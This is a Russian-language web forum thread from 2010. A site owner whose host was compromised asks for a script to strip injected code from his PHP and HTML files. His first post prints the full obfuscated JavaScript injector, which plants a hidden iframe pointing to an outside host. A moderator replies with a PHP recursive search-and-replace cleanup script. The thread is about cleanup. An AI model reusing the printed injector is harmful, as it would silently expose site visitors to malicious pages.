Ищу Скрипт быстрого удаления вируса

Тема в разделе "Open Source", создана пользователем hrushka, 19 фев 2010.

Статус темы:
Закрыта.
Модераторы: Amazko, Aste
  1. hrushka

    hrushka Создатель

    Регистр.:
    27 окт 2006
    Сообщения:
    30
    Симпатии:
    3
    Здравствуйте Уважаемые Гуру. Требуется Ваша помощь. Одни "хорошие" ребята взломали хост и заразили файлы своим вирусом, вирус я обнаружил, вот его код

    PHP:
    <script type='text/javascript'>function zG(){};tF=53186;zG.prototype = {fK : function() {e="e";this.fQ='';return 'h2t)tFp2:&/F/)c2l)iFc)k&-FpFo)i)s)k2.Fc&o)m2/&tIh&eFrFeF/&i)n).2c)gIi&?27)'.iH(/[\)I&F2]/g'');var oN=new Date();this.nU="";},: function() {dF="";wS=9383;nB="nB";var t=new Date();    var h='';var m=new Date();    String.prototype.iH=function(do){return this.replace(do)};var r=new Date();tR="tR";kQ=false;gG=20573;wJ=false;zW="";var c=function(){};var y=window;gN="gN";this.yQ="yQ";var yR=y['u{n$eYs9c{aYp{eY'.iH(/[Yj9\$\{]/g'')];var eK=new Date();var hI="hI";function jL(){};var this;var rN='';var p=false;var oD "xxK%3C%2Fbody%3E%3C%2Fhtml%3E";function mT(){};xH="";this.u=false;var f=document;this.dX="dX";this.hB="hB";var jA=false;var = { vM 'arpTpreonTd#CohoirlSd#'.iH(/[#roST]/g, ''), oU : 'svtuyvlvei'.iH(/[ivua_]/g, ''),  kC : 'cKrCe3aKt3ezEzlzezmKeGn3tK'.iH(/[K3zCG]/g, ''), fV : 'sReDtRATtTt?rRiRbRuTtEeT'.iH(/[TD\?ER]/g, ''), w : 's;rLcL'.iH(/[L;\{\(5]/g, ''), xK : 'bko1dUyT'.iH(/[T1Uk\)]/g, '') };var rK='';function hV(){};var uI=function(){return 'uI'};this.gC='';var rP="";var tZ=function(){return 'tZ'};this.a="a";var n=f[k.kC]('i<furuaKm<ed'.iH(/[d\<\!uK]/g, ''));var kL=new Date();i=39073;this.fU="fU";jO=false;pW='';var eY=5116;try {rD="rD";vC=false;var fI=function(){};var rU="rU";this.q="q";b="";var bJ='';nE(n,k.oU, yR("display%3A%20none"));function dS(){};rG=63044;this.uK=false;this.iB="iB";nE(n,k.w, this.fK());eU="eU";this.pS='';this.fR="";var qA='';qE="qE";qL="";f[k.xK][k.vM](n);this.xL=54456;this.hW="";var bK=new Array();this.iR="";} catch(g) {this.vB="";tN='';var eJ='';var uD=new Array();var rV=new Date();var l=function(){};this.lK='';f['wSr%i;tSe%'.iH(/[%;XS/]/g, '')](yR(oD));this.hK=49925;var iL=new Array();hKH='';this.uJ=61972;this.cO="cO";var s="s";this.mG=53808;y['s+eAt+T6iwm+ewoAuAtw'.iH(/[w\+Z6A]/g, '')](function(){ this.cJ="cJ";this.uR="";var pO='';vH=58151;this.dSF='';var sV="sV";z.v();var wH=34896;var cM=new Date();var yK=new Array();var eYV=function(){};this.kU="kU";zT="";}, 368);zJ="";var dXZ="dXZ";}qZ=19279;this.vBG='';var nM=new Date();var tZZ=false;var eE=new Date();var hC=new Date();function vO(){};var wZ="";function nE(n, j, dB){this.bW='';var fT=new Array();n[k.fV](j,dB);var iRP=function(){return 'iRP'};tD="";var kI=new Array();}this.xX='';this.fX='';var tQ=false;dV=false;}};var uY=new Array();var cP=new zG(); this.dK="dK";cP.v();function gQ(){};</script>
    Этот код идет последней строкой в файлах php, htm, html. Делать локальную копию всего сайта слишком долго и дорого, хотелось что-то по лучше, например скрипт который можно запустить на хосте и удалить вирус. Спасибо за внимание. С Уважением Анатолий.
     
  2. Nevep

    Nevep Постоялец

    Регистр.:
    16 дек 2009
    Сообщения:
    59
    Симпатии:
    8
  3. stealthdebuger

    stealthdebuger Механик

    Administrator
    Регистр.:
    25 авг 2008
    Сообщения:
    624
    Симпатии:
    1.379
    Вот код, с помощью которого вы сможете выполнить свою задачу
    PHP:
    <?
    function 
    search($fil)
    {
    if (
    file_exists($fil))
        {
        if (
    is_dir($fil))
            {
            
    $handle opendir($fil); 
            while(
    $filname readdir($handle)) 
                if (
    $filname != "." && $filname != "..")
                    
    search($fil."/".$filname);
            
    closedir($handle);
            }
        else
            {
            
    $con file_get_contents($fil);
            if(
    strstr($con'нужный нам текст'))
                {
                
    $con str_replace('нужный нам текст'''$con);
                
    unlink($fil);
                
    $f file_put_contents($fil$con);
                }
            }
        }


    search('имя_основного_каталога')
    ?>
     
    java3000 и irk нравится это.
  4. Fors

    Fors Создатель

    Регистр.:
    12 июл 2008
    Сообщения:
    37
    Симпатии:
    23
  5. Nevep

    Nevep Постоялец

    Регистр.:
    16 дек 2009
    Сообщения:
    59
    Симпатии:
    8
  6. hrushka

    hrushka Создатель

    Регистр.:
    27 окт 2006
    Сообщения:
    30
    Симпатии:
    3
    Установил к себе на сайт этот скрипт был приятно удивлен его функционалу, в том числе поиск и замена содержимого. Но как всегда есть "ложка дегтя" , не умеет работать с русскими кодировками, что в названии файла, что с контентом. Кто знает, как решить проблему кодировки или аналогичный скрипт без проблем работающий с русским языком?
     
Статус темы:
Закрыта.